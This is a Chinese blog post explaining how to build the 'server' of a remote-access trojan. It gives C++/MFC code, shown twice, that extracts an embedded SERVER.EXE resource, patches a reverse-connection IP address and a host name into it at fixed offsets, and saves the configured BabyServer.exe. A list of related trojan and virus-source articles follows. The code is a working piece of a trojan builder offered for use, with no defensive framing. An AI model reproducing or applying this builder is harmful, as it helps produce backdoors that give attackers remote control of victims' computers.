木马服务端生成技术详解
2010-02-12 16:36
429 查看
实现思路很简单 用16进制工具 打开.EXE文件 找到要替换的内容地址 进行更新写入就可以了
注意点: 地址是从0开始的如下图所示的 地址应该是:0X5124
其实改写代码如下:
void ServerConfig::OnCreate()
...{
UpdateData();
if(m_ip.IsEmpty()||m_name.IsEmpty())
...{
MessageBox("请输入反向连接的IP地址和主机上线名称 ");
}
DWORD dwSize,dwWritten;
HRSRC hr=FindResource(0,MAKEINTRESOURCE(IDR_SERVER),"SERVER");//查找资源
if(hr==NULL) MessageBox("hr error");
dwSize=SizeofResource(NULL,hr);
HGLOBAL hg=LoadResource(NULL,hr);//加载资源
if(hg==NULL) MessageBox("hg error");
LPSTR lp=(LPSTR)LockResource(hg);//锁定资源
if(lp==NULL) MessageBox("lp error");
LPBYTE p=(LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p==NULL) MessageBox("lp error");
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hg), dwSize); // 复制资源数据
CopyMemory((LPVOID)(p+0x5020), (LPCVOID)m_name.LockBuffer(),MAX_PATH); //写入主机名称信息
CopyMemory((LPVOID)(p+0x5124), (LPCVOID)m_ip.LockBuffer(),15); //写入主机名称信息
/**//*本地文件路径*/
CString SaveFilePath;
BROWSEINFO bi;
ZeroMemory(&bi,sizeof(BROWSEINFO));
bi.hwndOwner=GetSafeHwnd();
bi.lpszTitle="将文件保存到";
LPITEMIDLIST idl=SHBrowseForFolder(&bi);
if(idl==NULL)
return;
SHGetPathFromIDList(idl,SaveFilePath.LockBuffer());
strcat(SaveFilePath.LockBuffer(),"/");
strcat(SaveFilePath.LockBuffer(),"BabyServer.exe");
HANDLE hFile;
hFile = CreateFile(SaveFilePath.LockBuffer(),GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);//创建文件
if(hFile == NULL) MessageBox("file error");
else MessageBox("服务端文件生成成功!");
WriteFile(hFile,(LPCVOID)p,dwSize,&dwWritten,NULL);//写入文件
CloseHandle(hFile);
}
IDC_SERVER为引入的SERVER.EXE资源文件 SERVER为 资源类类型
注意点: 地址是从0开始的如下图所示的 地址应该是:0X5124
其实改写代码如下:
void ServerConfig::OnCreate()
...{
UpdateData();
if(m_ip.IsEmpty()||m_name.IsEmpty())
...{
MessageBox("请输入反向连接的IP地址和主机上线名称 ");
}
DWORD dwSize,dwWritten;
HRSRC hr=FindResource(0,MAKEINTRESOURCE(IDR_SERVER),"SERVER");//查找资源
if(hr==NULL) MessageBox("hr error");
dwSize=SizeofResource(NULL,hr);
HGLOBAL hg=LoadResource(NULL,hr);//加载资源
if(hg==NULL) MessageBox("hg error");
LPSTR lp=(LPSTR)LockResource(hg);//锁定资源
if(lp==NULL) MessageBox("lp error");
LPBYTE p=(LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p==NULL) MessageBox("lp error");
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hg), dwSize); // 复制资源数据
CopyMemory((LPVOID)(p+0x5020), (LPCVOID)m_name.LockBuffer(),MAX_PATH); //写入主机名称信息
CopyMemory((LPVOID)(p+0x5124), (LPCVOID)m_ip.LockBuffer(),15); //写入主机名称信息
/**//*本地文件路径*/
CString SaveFilePath;
BROWSEINFO bi;
ZeroMemory(&bi,sizeof(BROWSEINFO));
bi.hwndOwner=GetSafeHwnd();
bi.lpszTitle="将文件保存到";
LPITEMIDLIST idl=SHBrowseForFolder(&bi);
if(idl==NULL)
return;
SHGetPathFromIDList(idl,SaveFilePath.LockBuffer());
strcat(SaveFilePath.LockBuffer(),"/");
strcat(SaveFilePath.LockBuffer(),"BabyServer.exe");
HANDLE hFile;
hFile = CreateFile(SaveFilePath.LockBuffer(),GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);//创建文件
if(hFile == NULL) MessageBox("file error");
else MessageBox("服务端文件生成成功!");
WriteFile(hFile,(LPCVOID)p,dwSize,&dwWritten,NULL);//写入文件
CloseHandle(hFile);
}
IDC_SERVER为引入的SERVER.EXE资源文件 SERVER为 资源类类型
相关文章推荐
- 木马服务端生成技术详解
- 木马服务端生成技术详解
- 木马服务端生成技术详解
- 浅析木马服务端的生成技术
- 浅析木马服务端的生成技术
- 浅析木马服务端的生成技术
- 木马生成技术详解
- 黑客知识之浅析木马服务端的生成技术
- 木马生成技术详解
- 浅析木马服务端的生成技术
- 浅析木马服务端的生成技术
- 浅析木马服务端的生成技术
- 使用appledoc 生成技术API文档详解
- CSS border三角、圆角图形生成技术详解
- 木马程序开发技术:病毒源代码详解
- 汇编实现木马生成技术
- 木马生成技术
- 图文详解“高级木马的自我保护技术与查杀之策”
- 透视木马程序开发技术:病毒源代码详解
- SSE技术详解:使用 HTTP 做服务端数据推送应用的技术